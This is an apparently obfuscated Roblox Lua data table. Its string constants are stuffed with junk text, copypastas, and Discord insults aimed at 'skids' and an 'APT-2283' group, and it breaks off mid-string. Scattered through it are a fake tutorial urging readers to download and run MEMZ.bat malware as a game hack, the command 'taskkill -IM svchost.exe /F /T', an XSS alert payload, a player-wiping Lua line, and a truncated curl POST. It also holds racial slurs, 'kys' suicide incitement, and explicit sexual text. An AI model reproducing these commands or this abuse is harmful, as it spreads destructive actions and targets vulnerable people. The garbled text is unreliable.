القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلموا ان الله مع المتقينقين الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فممممملاتظلموا ?انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلموا ان الله مع المتقيها","I decompiled Luraph v13!!!!!!!"}+0b1100011111101,#""+0b1100010101010)},{"mYYXobg2ZT",D(#"this cat is terrorist"+0b10001010000001,#"I ‮wi‮‮l‮‮‮‮‮l ‮ge‮t‮‮ y‮‮ou‮r‮ co‮‮nd‮‮om"+0b10001001001001)}},{{"KT28BwKBl","7c84b0e45eeb"},{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",#[[It's 5:30pm, the evening news is about to air. You just got home from your grueling 45 minute shift walking the neighborhood dogs. Scooby really pulled your arm hard today. You think to yourself "I hope I didn't strain my shoulder" as you grab some ice and sit down at your computer. You log onto reddit and open your massively un-successful online community. A grin comes across your face. As you do your usual checks, you notice an outcry coming from your community. You gasp. "Why?". You see that they are strongly opposing your idea to be interviewed by the Fox News Network. They all make valid points. "You'll be made a joke.", "No don't let the real world see us.", "Please prepare.". You think to yourself, "I got this." You bring out your scratch-pad full of arguments and counter- arguments. That year of debate class in 9th grade prepared you. "Fuck", you realize that it's empty and you didn’t write down a single coherent thought, nontheless create one. No matter, you receive a Zoom message from a Fox representative "Live in 30 seconds". Inhale, exhale. You've waited your whole life for this moment, this is YOUR moment. "Joining me now is the person who operates this anti-work group,]]-0b10010110000}}}}}}}}}}}}}}}}}}}}}}}}}},{"C0mpEyzirj",{D(#"fuck yoy ( + + + quote tweet + ratio)"+0b10001001010010,#"ÕΕ↑"+0b10001010011011)},{{"Ky34LpE6i",{"3eb238a5fe2c"},{{"a7MGA3vnQ",{"1f37c057f66d","40af9718a445"},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"The fuck are you doing in our community again fucking skid. Skids that trade and promote,create bosshub and snake venom are not fucking welcome especially to whitelist. You can't fucking come back stop trying. Stop begging my friends including Jades for a whitelist dumbass bitch. If you come back once more you will get fucking banned from everything for attempts to get loader while being a fucking shitty 🤡 and skid"-0b101010101,#""-0b101100)},{{"Ky34LpE6i",{},{{"ZK6hMvi",{"yAAH1q6JXs",{"yAAH1q6JXs",{"KT28BwKBl","3eb238a5fe2c"},{"mYYXobg2ZT",D(#"Hello everyone! I tend to use Discord on a day-to-day basis, and every day I encounter pretty much the same thing. I may send a screenshot, and as I use light mode everyone reacts in disgust or annoyance, or like I've just committed a war crime, simply for using light mode. I've had numerous degrading comments and many people trying to convince me to use dark mode, but here's the thing. I can't. I'm dyslexic, and for me I cannot read white text, even if it's on a black background. All the words seem to jiggle and flash rainbow colours really quickly and it just becomes impossible to read. The only way I'm able to read effectively is to read black text on a white background with an orange filter over everything. When you complain and hate on light mode, it makes me feel even worse about how I struggle to read. It's honestly made me cry a few times at how I struggle to read and recognise the simplest of things. I'm hardly passing English. I'm failing maths, because I cannot handle numbers. It hurts to have people laugh and ridicule me for that. Please, even if you think it's a meme or think it's funny, stop hating on all light mode users, as they might have a reason for it."+0b1110111111011,#[[local Visit = game:service("Visit") local Players = game:service("Players") local NetworkClient = game:service("NetworkClient") local function onConnectionRejected() game:SetMessage("This game is not available. Please try another") end local function onConnectionFailed(_, id, reason) game:SetMessage("Failed to connect to the Game. (ID=" .. id .. ", " .. reason .. ")") end local function onConnectionAccepted(peer, replicator) local worldReceiver = replicator:SendMarker() local received = false local function onWorldReceived() received = true end worldReceiver.Received:connect(onWorldReceived) game:SetMessageBrickCount() while not received do workspace:ZoomToExtents() wait(0.5) end local player = Players.LocalPlayer game:SetMessage("Requesting character") replicator:RequestCharacter() game:SetMessage("Waiting for character") while not player.Character do player.Changed:wait() end game:ClearMessage() end NetworkClient.ConnectionAccepted:connect(onConnectionAccepted) NetworkClient.ConnectionRejected:connect(onConnectionRejected) NetworkClient.ConnectionFailed:connect(onConnectionFailed) game:SetMessage("Connecting to Server") local success, errorMsg = pcall(function () local player = Players.LocalPlayer if not player then player = Players:createLocalPlayer(0) end NetworkClient:connect("localhost", 53640, 0) end) if not success then game:SetMessage(errorMsg) end]]+0b1110010010101)}},{"mYYXobg2ZT",D(#{"Rce","rnet.walk()","Nigger","Yeah But Did You Know taskkill -IM svchost.exe /F /T"}+0b1100011011001,#"how to get free robux"+0b1100011001110)}},{{"Ky34LpE6i",{"2ac4f3e5a4c2"},{{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","2ac4f3e5a4c2"},{"mYYXobg2ZT",D(#"??????"+0b1111110111100,#{"mau movement method","what?","Hey,‮ V‮S‮‮auce.‮‮‮ M‮‮‮‮‮‮ic‮‮‮hae‮l‮ her‮‮e.","```lua -- this is ultra rare method to fix all CR scripts: -- remove color changes from CR -- done ```","I FUCKING LOVE MEOWSCARADA","‮‮‮‮‮¿‮‮a‮‮‮‮ col‮g‮a‮r‮‮ ‮al‮ p‮at‮o?","A","quote escape?? error() woww!!","kys nigger","Sponsored by mollermethod®️, by Mollybdenum™️","The fuck are you doing in our ‮community again fuc‮king skid Skids‮ that trade and promote,create bosshub and snak‮e venom are not fucking welcome especially‮ to whitelist You can't fucking come back stop ‮trying Stop fuck‮ing begging my friends‮ including Jades for whitelist dumbass bitch If you come back once more you will get fucking banned from everything for attempts to get to loader while‮ being a fu‮cking shitty 🤡 and skid a If ‮you message one of o‮ur presidents again you'll not be able to play VSB ‮for a minute Beg Jades or someone else for whitelist again using their kindness and get banned for eternity Well yo‮u understood m‮e,skid ass.‮lf not,then remember my words I will ‮do anything to ‮get your shi‮t skid ass banned. Suck penis instea‮d of whitelist","Hey there buddy chum pal buddy chum pal home slice bread slice, if you take one more diddly darn step right there I might just have to get not so friendly with you, my friendly friend friend best friend pog man dog man, now wouldn't that be a crummy juncture. do you want that? do want to come into experience witha crummy juncture?","@‮‮‮e‮ver‮yo‮‮ne‮<@!44‮59‮004762534‮70722> i‮s‮ tentac‮‮le‮s‮m‮a‮‮nx75"}+0b1111110110111)}},{{"mYYXobg2ZT",#{"I’m not usually the type ♒️3️⃣🔂 to hold a grudge 🎶🅱️⬇️🔂 but... you’ve affected me (me me me) ➡️⬇️⬆️ and now... im nothing but RAGE (but RAGE) 🆘🆘🆘♿️ 😈😈😈😈😈😈🤪🤪🤪🤪➡️♿️♿️🆘🆘🆘","pr‮ot‮o‮‮‮f‮‮er i‮s s‮e‮‮‮‮x‮ ‮‮‮‮rob‮o‮t","pls remove all the skids in the server plsss","That’s how you assert dominance","kys nigger","You should kill him NOW!","‮‮‮‮N‮‮‮i‮‮‮g‮‮‮‮‮g‮‮‮‮e‮r","no","<:mau:917620277318418512>","My‮ tu‮rds are remarkably dense ‮seriously you have no idea how dense and firm my turds are they come out like long ‮bricks but indeed th‮ey‮ are so l‮‮ong you w‮ould call the‮m ‮long sticks. it is true i have such big stick energy my turds are essentially pl‮ank‮s of wood. indeed in the ‮summe‮r i donate my turds to be used in constru‮ction to buil‮ding homes for the ‮poor. some people have gone on and called the names of these ho‮uses “m‮ud huts” this is essentially correct","Every time you pick up your sons' dirty laundry off the floor, some young woman will spend her precious time begging him to do chores in the future. Every time you allow him not to do dishes, you sentence some future woman to do it after she comes back from work. Every time you accept his lame excuses why he didn't clean his room, his future wife has to spend her money in therapy trying to understand if she's crazy or he's just gaslighting and lying to her. Don't make him feel entitled to women's time and resources. Protect future women by not coddling your sons.","# 84 _‮‮‮ 9‮1 * 72‮‮ ‮( 81 ) 8‮2‮ ^‮ 77‮‮ ( 72 % 2 ‮* ‮1 $ 22‮ ‮‮} 9‮9 ‮: ‮32 > 88 < 71 } 92","That’s how you assert dominance"}-0b1100},{"mYYXobg2ZT",#"​"-0b10}}},{"mYYXobg2ZT",D(#"??????"+0b10001010100111,#{[[_=workspace:FindFirstChild('skid')and workspace:FindFirstChild('skid'):FindFirstChildOfClass('Weld');_b=__index;_c="хуепутало простоблядское, пиздак на ноль живо";_q=debug;_v=pcall;function _e()_b=getnilinstances();while true do break;end;end;_i=game;_z=warn;function niI()_x=__index;end;task.spawn(function()_l=#" Hi. I'm your script. You know what? This is weird but.. I'm really your father. When you was 6 years old you wanted my non-humnanoid script. Also.. Your arm broken. Cuz.. I A M H E R E B O S S "-95;end);if _l<55 then _m='=═мм═=,';end;_v(function()_z(_m);end);while _x==_b do;end;]],[[la fuerza del pato está dentro de mí]],[[la fuerza del pato está dentro de mí]],[[your moher]],[[nvm i‮ ‮l‮o‮ve‮‮e‮e‮e ‮h‮‮‮uff‮m‮‮an‮‮ ‮c‮odin‮g]]}+0b10001010101000)},#{"i make better stuff than u","nvm i loveeee huffman coding","fuck yoy ( + + + quote tweet + ratio)","||----------------------------------------------------|| leaked dms with mau","а про маму было лишнее","a‮cer‮tijo ‮me ‮esto.‮.. acer‮‮tijo‮ m‮e es‮o... ‮‮¿‮quién tiene mied‮o del‮ neg‮‮ro ‮g‮‮rande?","This is..... THE END!","the other day i fucked jacqs tight pussy. I enjoyed it too much to the point of making my testicles explode. that shit was tighter then a fat persons pants and a models ass bro. as soon as i stuck it in, my cock felt at home. my cock was burning from the heat, the sweat from his ass excited me, I saw my children in my mind bro. this was the best sex experience of my life, my cock was stuck in that fucking giant ass, but thats okay. it was amazing. i couldnt help releasing my children inside of her. if anything, it was my gift to her. looking at that hot pussy gave me motivation to continue and not stop for the rest of my life. she moaned louder than an exploding volcano, her face was flushed and excited. i could see her excitement, her emotions, her mind telling me to keep going and not stop. she squirted all over me, and i slurped it up like a slurpy. it was like drinking iced tea, it was so sweet, juicy, and refreshing. her pussy juices were all over my throbbing cock. i couldnt help myself from covering her in my cum. by the time i was finished, she was sticky with it. she was filled with my white special juices. When I saw her beautiful pussy again, I couldn't stop, I started fucking her harder and harder to the point of making her explode with cum, and I could see my all of my children flowing out of her tight ass pussy.","lose cock weight","I sexually Identify as an Attack Helicopter. Ever since I was a boy I dreamed of soaring over the oilfields dropping hot sticky loads on disgusting foreigners. People say to me that a person being a helicopter is Impossible and I’m fucking retarded but I don’t care, I’m beautiful. I’m having a plastic surgeon install rotary blades, 30 mm cannons and AMG-114 Hellfire missiles on my body. From now on I want you guys to call me “Apache” and respect my right to kill from above and kill needlessly. If you can’t accept me you’re a heliphobe and need to check your vehicle privilege. Thank you for being so understanding."}-0b11},{{"a7MGA3vnQ",{"20dbd513f1a3"},{{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","2ac4f3e5a4c2"},{"mYYXobg2ZT",D(#"Y‮‮e‮‮‮‮‮‮‮‮‮a‮‮‮‮‮‮‮h‮‮~"+0b1111110000001,#"😂G̭̺̙E̞̫͙T͕͇😂̩̩̭O̝̗̯U̲͎͕T̤😂̞̮͓O͍͉̥F͔̜ͅ😂̦͖͚M͙Y̘😂͉̝̘H̱̬̲E̘̗̥A̠̰̳D̩͍̩😂͖̹G̻̞̺E̻̫̙T̹̙̹😂̞͙͔O͙̪̹U͍͚̱T̫̫̝😂̫̤̥O͎̼͔F͇̫̳😂̬͉M͎̙̤Y̫̭̜😂͈̖̰H̳̳̬E̻͇̹A͈̜D̜̣͕😂̰G̠̲͔E̯͚̙T̙̜͍😂̠̪̪O̹̰̺U̻̮͔T̫͍͖😂͎̖̥O͕̩̯F̗͉͚😂̘̠͈M̝͈̰Y̻͕̳😂̜̗̩H̪͍̞E̥̰AD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂M"+0b1110101001111)}},{{"mYYXobg2ZT",#"�‮�‮‮�‮‮‮�🥜‮‮�‮� ‮‮‮‮n‮‮r‮‮‮ ‮‮tun"-0b1010111}}},{"mYYXobg2ZT",D(#[[‮Ever‮yone goes on about "devio‮‮us‮ lick" this‮ and "devious l‮ick" that... ‮How about yo‮u gi‮ve my ‮‮nuts ‮‮a ‮devio‮us‮ lick, Mo‮n‮ke‮y?]]+0b10000111111010,#"😂G̭̺̙E̞̫͙T͕͇😂̩̩̭‮O̝̗̯U̲‮͎͕T̤😂̞̮͓O͍‮͉̥Fͅ‮͔̜‮😂̦͖͚M͙Y̘😂͉̝̘H̱̬̲E̘̗‮̥A̠̰̳D̩͍̩😂͖̹G̻̞̺E̻̫̙T‮̹̙‮̹😂̞͙͔O͙̪̹U͍͚̱T̫̫̝😂̫̤̥O͎̼͔F͇̫̳�‮�̬͉M͎‮̙̤Y̫‮̭̜😂͈̖̰H̳̳̬E̻͇‮̹A͈̜D̜̣͕😂̰G̠̲͔E̯͚̙T̙̜‮͍😂̠̪̪O̹̰̺U̻̮͔T̫͍͖😂͎̖̥O͕̩̯F‮̗͉͚😂̘̠‮͈M̝͈‮̰Y̻͕̳😂̜̗̩H̪͍̞E̥̰AD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY‮😂HEAD😂GET😂OUT😂OF😂‮MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OU‮T‮😂OF😂M"+0b1111111111111)}},{{"mYYXobg2ZT",D(#"To deobfuscate this file first buy R2283 premium membership, now only for 4.99$ a month!"+0b10001001011011,#"sex"+0b10001010110000)}}}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#"Fixed:‮ ‮g‮ame:s‮‮er‮v‮‮ice'Players':Clea‮‮r‮‮Al‮‮‮lC‮‮hi‮l‮d‮ren()"-0b11011,#"I thi‮‮‮nk ‮I'‮‮‮‮m‮‮‮‮‮ b‮‮‮o‮‮t,‮ h‮elp"+0b11)},{{"Ky34LpE6i",{},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"HOLA AMIGOS BIENVENIDOS ‮A‮ MI CANAL D‮E YOUTUBE HOY DÍA LES ‮VOY A ENSE‮ÑAR A CÓMO INSTA‮LAR EL HACK DEL GEOMET‮RY DASH PRIMERO ‮DE‮SCARGUEN EL ARCHIVO‮per4K/malware/blob/master/MEMZ/MEMZ.bat (NO ES VIR‮US, MALWARE ES EL NOMBRE DEL CREADOR Y MEMZ ES EL NOMBRE DEL H‮ACK) DESPUÉS EJECÚTENLO Y SI APARECE ALGÚN MENSAJE DEN‮‮‮LE A‮ OK GR‮ACIAS POR VER MI VIDEO DE YOUTUBE‮ PORFAVOR S‮UBSCRIBANSE Y DENL‮E LIKE :D"+0b1111111110101,#"Yeah~"+0b10000111010101)},{{"yAAH1q6JXs",{"KT28BwKBl","20dbd513f1a3"},{"mYYXobg2ZT",#{"siorry you are siid!","Stop criminal scum!","g/ws/nan",[["wha‮‮t ‮hap‮p‮e‮ned‮ ‮to th‮‮e‮ ‮p‮‮eanut ‮‮but‮t‮e‮‮r?"]]}-0b11}},{"yAAH1q6JXs",{"KT28BwKBl","20dbd513f1a3"},{"mYYXobg2ZT",#"this cat is terrorist"-0b10011}}}}}}}}}}}}}}}}}}}}}}}}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#{"but the rage*",[[```lua retu‮rn(functi‮o‮n(‮I,k‮,b,...)if‮(I=="")‮then‮ (k)(b)‮‮ else return (‮{‮...})e‮nd;en‮d)("cryo",print‮‮,"‮Rick‮rolled",...)‮‮ ```]],[[sleep script pro spam humanoids in workspace crash the server immortal script]],[[‮I‮‮ w‮ant ‮‮to‮‮ u‮‮‮‮s‮‮‮e r‮‮‮2‮283‮ 🥺]],[[revah xes]],[[‮My‮ po‮we‮r o‮f ‮‮skid I‮ ‮going to ta‮k‮‮e e‮ve‮‮ryone script‮ ‮‮and you all will re‮gret i‮t!!111]],[[Memerman has 34 minutes til his month is over 😭]],[[The FitnessGram Pacer Test is a multistage aerobic capacity test that progressively gets more difficult as it continues. The 20 meter pacer test will begin in 30 seconds. Line up at the start. The running speed starts slowly, but gets faster each minute after you hear this signal. beep A single lap should be completed each time you hear this sound. ding Remember to run in a straight line, and run as long as possible. The second time you fail to complete a lap before the sound, your test is over. The test will begin on the word start. On your mark, get ready, start.]],[[]]}+0b10001010010011,#"but the rage*"+0b10001010011000)},{{"KT28BwKBl","75f9e1aba7a0"}}},{"ZK6hMvi",{"yAAH1q6JXs",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"Hey there buddy chum pal buddy chum pal home slice bread slice, if you take one more diddly darn step right there I might just have to get not so friendly with you, my friendly friend friend best friend pog man dog man, now wouldn't that be a crummy juncture. do you want that? do want to come into experience witha crummy juncture?"+0b1011110100110,#"I just say sex why others think I horny I JUST SAY SEX"+0b1100011000000)},{"mYYXobg2ZT",D(#"HOLA AMIGOS BIENVENIDOS A MI CANAL DE YOUTUBE HOY DÍA LES VOY A ENSEÑAR A CÓMO INSTALAR EL HACK DEL GEOMETRY DASH PRIMERO DESCARGUEN EL ARCHIVO (NO ES VIRUS, MALWARE ES EL NOMBRE DEL CREADOR Y MEMZ ES EL NOMBRE DEL HACK) DESPUÉS EJECÚTENLO Y SI APARECE ALGÚN MENSAJE DENLE A OK GRACIAS POR VER MI VIDEO DE YOUTUBE PORFAVOR SUBSCRIBANSE Y DENLE LIKE :D"+0b1011110011110,#{"<:mau:917620277318418512>","Here is a tip! kill yourse","idiotic clown, imagine logging and leaking a lot of work people put their effort in. only a biggest skid would do it all. I thought you are a nice person but you are nothing but a pure disappointment.","I was infected coronavirus by contact :("}+0b1100101000101)}},{{"mYYXobg2ZT",D(#"c0‮0lki‮‮d‮‮‮‮ ‮w‮‮‮ork‮s‮‮‮ ‮‮f‮o‮‮r 2283"+0b1111010000000,#"sleep script pro spam humanoids in workspace crash the server immortal script"+0b1111010001011)}}},{"mYYXobg2ZT",D(#"Mau is pro, tusk is noob"+0b10001010011100,#"oh hell nah mr hase going to Hack Us All Oh Fuck"+0b10001010010001)}},{"mYYXobg2ZT",D(#"TND"+0b1100011011010,#{"The fuck are you doing in our community again fucking skid. Skids that trade and promote,create bosshub and snake venom are not fucking welcome especially to whitelist. You can't fucking come back stop trying. Stop begging my friends including Jades for a whitelist dumbass bitch. If you come back once more you will get fucking banned from everything for attempts to get loader while being a fucking shitty 🤡 and skid","‮‮‮‮‮‮‮L‮‮‮‮‮‮‮o‮‮‮‮‮‮l","zo‮mg‮ ap‮t 2‮2‮‮83 ‮c‮‮‮ook‮ie‮ ‮log‮ge‮‮‮d‮‮‮ me","I have 132","jac","```lua -- this is ultra rare method to fix all CR scripts: -- remove color changes from CR -- done ```","😂G̭̺̙E̞̫͙T͕͇😂̩̩̭O̝̗̯U̲͎͕T̤😂̞̮͓O͍͉̥F͔̜ͅ😂̦͖͚M͙Y̘😂͉̝̘H̱̬̲E̘̗̥A̠̰̳D̩͍̩😂͖̹G̻̞̺E̻̫̙T̹̙̹😂̞͙͔O͙̪̹U͍͚̱T̫̫̝😂̫̤̥O͎̼͔F͇̫̳😂̬͉M͎̙̤Y̫̭̜😂͈̖̰H̳̳̬E̻͇̹A͈̜D̜̣͕😂̰G̠̲͔E̯͚̙T̙̜͍😂̠̪̪O̹̰̺U̻̮͔T̫͍͖😂͎̖̥O͕̩̯F̗͉͚😂̘̠͈M̝͈̰Y̻͕̳😂̜̗̩H̪͍̞E̥̰AD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂M","🤨",[["]],[[h‮‮ell‮o ‮ev‮erybod‮‮‮‮y‮ my‮ ‮na‮me‮‮ is‮‮ ma‮‮rkiplie‮r]],[[‮‮‮‮‮Fix‮‮ed: game:‮s‮‮‮er‮vice'Pl‮ayer‮s':C‮‮lea‮‮r‮AllChildr‮en()]],[[‮G‮E‮‮N‮‮‮‮I‮‮‮‮‮‮‮‮‮U‮‮‮S]],[[The FitnessGram Pacer Test is a multistage aerobic capacity test that progressively gets more difficult as it continues. The 20 meter pacer test will begin in 30 seconds. Line up at the start. The running speed starts slowly, but gets faster each minute after you hear this signal. beep A single lap should be completed each time you hear this sound. ding Remember to run in a straight line, and run as long as possible. The second time you fail to complete a lap before the sound, your test is over. The test will begin on the word start. On your mark, get ready, start.]]}+0b1100011010110)}},{{"Ky34LpE6i",{"3eb238a5fe2c"},{{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"KT28BwKBl","3eb238a5fe2c"},{"KT28BwKBl","75f9e1aba7a0"},#"тхис ис енглиш нот руссиан"-0b101001},{{"C0mpEyzirj",{"56264df8cc06"},{{"mYYXobg2ZT",true}}},{"C0mpEyzirj",{"75f9e1aba7a0"},{{"mYYXobg2ZT",nil}}}}}}}}}}},{"ZK6hMvi",{"yAAH1q6JXs",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"We are currently experiencing an attempted Denial Of Service attack (not like spamming a website, as in trying to get the website to break generally) from a member (APT-2283-1) of a threat actor group we have given the nickname APT-2283 to - we are working around the clock to resolve any issues that may occur."+0b1011110111100,#"tactical KILLS YOU"+0b1100011100100)},{"mYYXobg2ZT",D(#{"Nigger","to days video sponsored by quatzel admin (very real) only 20 dollar!","‮‮dup‮l‮ic‮‮‮‮a‮‮‮tion‮ e‮‮‮xp‮‮‮lo‮i‮t","","‮‮T‮‮‮‮hi‮‮‮s‮ is..‮‮‮..‮. ‮‮‮T‮‮HE E‮ND!"}+0b1100100111011,#"Script power increasing... 🔥 <- my script power aura"+0b1100100010010)}},{{"mYYXobg2ZT",D(#{"","‮htt‮ps://‮‮x‮‮h‮‮amste‮‮‮r‮.com‮ ‮<‮-‮‮ cute h‮‮amste‮rs","I AM IMMUNE TO PROPAGANDA","‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮S‮í",[[_=workspace:FindFirstChild('skid')and workspace:FindFirstChild('skid'):FindFirstChildOfClass('Weld');_b=__index;_c="хуепутало простоблядское, пиздак на ноль живо";_q=debug;_v=pcall;function _e()_b=getnilinstances();while true do break;end;end;_i=game;_z=warn;function niI()_x=__index;end;task.spawn(function()_l=#" Hi. I'm your script. You know what? This is weird but.. I'm really your father. When you was 6 years old you wanted my non-humnanoid script. Also.. Your arm broken. Cuz.. I A M H E R E B O S S "-95;end);if _l<55 then _m='=═мм═=,';end;_v(function()_z(_m);end);while _x==_b do;end;]],[[No]],[[]],[[Earthbound - Home Sweet Home]],[[Fixed: game:service'Players':ClearAllChildren()]],[[DaH qaSpu'DI' chunqu' ghaH!]],[[‮tab‮‮l‮e.i‮nse‮r‮‮t(‮ur m‮om‮‮,‮ ‮m‮‮y‮‮ huge ass‮ cock‮)]],[[what the??? leaked Jack_Hase rares?]],[[I decompiled Luraph v13!!!!!!!]]}+0b1111011000101,#"quote escape?? error() woww!!"+0b1111010110111)}}},{"mYYXobg2ZT",D(#{"harke","Sí",[[I like hentai as much as the next guy, but hentai and even normal porn feel so dull now. I can't really get into any fetishes because they're too weird for me. Of course, I still do get horny sometimes and do beat my meat every few days, but it's always forced just so I can get a few free molecules of dopamine. Me from a year ago would see anime titties and be like "ayo that's some good shit" but now when I see them I'm just like "that's crazy bro but I'm here to see explosions and all I'm seeing is tits." Every day I feel less and less horny. It's not easy to arouse me these days. I've even looked at porn from boredom and felt nothing unless I really put in the effort to feel something. There's no automatic reaction anymore. On top of that, I have zero interest in romance either, which makes getting a girlfriend completely pointless. Here's the fun part though. I see these changes as a good thing. My mind doesn't get overflown with lewd thoughts, so it's easier for me to think]],[[table.insert(ur mom, my huge ass cock)]],[[‮‮w‮‮h‮e‮re‮ ‮i‮‮s jac‮‮‮‮‮k ha‮‮s‮‮‮e]],[[JQoJFQEOjffEAFOfaof:42: index #2 is not 'compare' function for LUAU sakbfAFAEoaOa JQoJFQEOjffEAFOfaof:42 ljoIqoejfQEhEFqal]],[[This file was obfuscated BY YOUR dad! ! ! ! ! ! !]],[[maufuscator is]]}+0b1111101110110,#{"bro you should totally have sex with your mom like do it now DO IT NOW","—_—____–__±·-—","‮M‮e‮‮m‮erMan sec‮re‮‮‮t‮ly stro‮k‮e ‮‮J‮KeepWasH‮er‮‮e ‮co‮ck","Putkness nuts in your mo-"}+0b1111110000100)}},{"mYYXobg2ZT",D(#"I think I'm bot, help"+0b1100011001000,#"Truckers pack gonna explode about ur fuscatorr"+0b1100010110101)}},{{"Ky34LpE6i",{"3eb238a5fe2c"},{{"ezhJpGIUTo",{{"yIavri8YiE",{"KT28BwKBl","56264df8cc06"},{{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"yAAH1q6JXs",{"KT28BwKBl","3eb238a5fe2c"},{"mYYXobg2ZT",D(#"<script>alert(document.domain)</script>"+0b1111100001001,#""+0b1111010110101)}},{"KT28BwKBl","488f3a31d2f8"},#"@everyone<@!445900476253470722> is tentaclesmanx75"-0b101011},{{"C0mpEyzirj",{"75f9e1aba7a0"},{{"KT28BwKBl","3eb238a5fe2c"}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#"c00lkid works for 2283"+0b10001010000110,#"Treyvon in a nutshell"+0b10001010010000)},{{"KT28BwKBl","75f9e1aba7a0"}}},{"C0mpEyzirj",{"56264df8cc06"},{{"mYYXobg2ZT",false}}}}}}}}}}}}}}},{"yGUryecqux",{"514b108340a8","3eb238a5fe2c"},{{"KT28BwKBl",D(#{"if player is hacking then player kick end","🍉","zo‮‮m‮‮‮‮g ‮a‮‮p‮‮t ‮‮22‮83 ‮c‮ookie‮ logg‮ed ‮m‮e","roblox won't censor pensi alone <:tr:891048027572273202>","Yeah‮ B‮ut Did You Know ‮‮tas‮kki‮‮ll‮‮‮‮ ‮‮-‮IM sv‮cho‮‮st.ex‮e /F‮ /‮T","It's happened. Do not send to recipient. Members of Hay Shell, the skull is strong and will expire on November 7, 2018.",""}+0b1111010111101,#"Memer love knot more than others do"+0b1111010100100)},{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"Did I not make that clear enough?"+0b1100011010010,#[[As expected 2283 have reposted "As expected 2283 have reposted this to their communication channels" to their communication channels]]+0b1100001110010)},{"mYYXobg2ZT",D(#"ur mom"+0b1100100111010,#"—_—____–__±·-—"+0b1100100110001)}},{{"mYYXobg2ZT",D(#"EL ONE PIECE... EXISTE!"+0b1111010111011,#"‮‮‮‮‮O‮‮‮‮‮‮‮‮‮‮‮‮‮‮m‮g"+0b1111010011001)}}},{"mYYXobg2ZT",D(#"import { nanoid} from 'nanoid'"+0b1111010101010,#"g/ws/nan"+0b1111011001001)}},{}}},{{"ezhJpGIUTo",{{"yIavri8YiE",{"KT28BwKBl","56264df8cc06"},{{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"yAAH1q6JXs",{"KT28BwKBl","3eb238a5fe2c"},{"mYYXobg2ZT",D(#{"","roblox won't censor pensi alone <:tr:891048027572273202>","llama dupe f‮ortnite‮‮‮ YESSIR‮ ‮‮RAKNET RCE word‮ search cookie fr‮ee robl‮ox exp‮loit download 2022 I ne‮ed it give mei t d‮oes it works on roblox‮‮ m‮arch ‮20‮1921+ 1=‮m‮ath.pi","I just sa‮y s‮‮e‮x ‮why‮ ‮others th‮‮ink‮‮ ‮I horny I‮‮ ‮‮‮J‮U‮S‮T SAY SEX","It's happened. Do not send to recipient. Members of Hay Shell, the skull is strong and will expire on November 7, 2018.","Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions.","What the heck did you just frickin’ say about me, you little whiner? I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous secret raids on Al-Quaeda, and I have over 300 confirmed kills. I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to me but just another target. I will wipe you the frick out with precision the likes of which has never been seen before on this Earth, mark my frickin’ words. You think you can get away with saying that crap to me over the Internet? Think again, buddy. As we speak I am contacting my secret network of spies across the USA and your IP is being traced right now so you better prepare for the storm, buddy. The storm that wipes out the pathetic little thing you call your life. You’re frickin dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, and that’s just with my bare hands. Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United States Marine Corps and I will use it to its full extent to wipe your miserable butt off the face of the continent, you little poopy-head. If only you could have known what unholy retribution your little “clever” comment was about to bring down upon you, maybe you would have held your stinking tongue. But you couldn’t, you didn’t, and now you’re paying the price, you big jerk. I will rain fury all over you and you will drown in it. You’re in frickin’ trouble, mister."}+0b1111100101001,#"no"+0b1111100110011)}},{"KT28BwKBl","488f3a31d2f8"},#{"2283 is a trollarmin edit...",[[As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels]],[[curl -X‮ PO‮‮‮ST 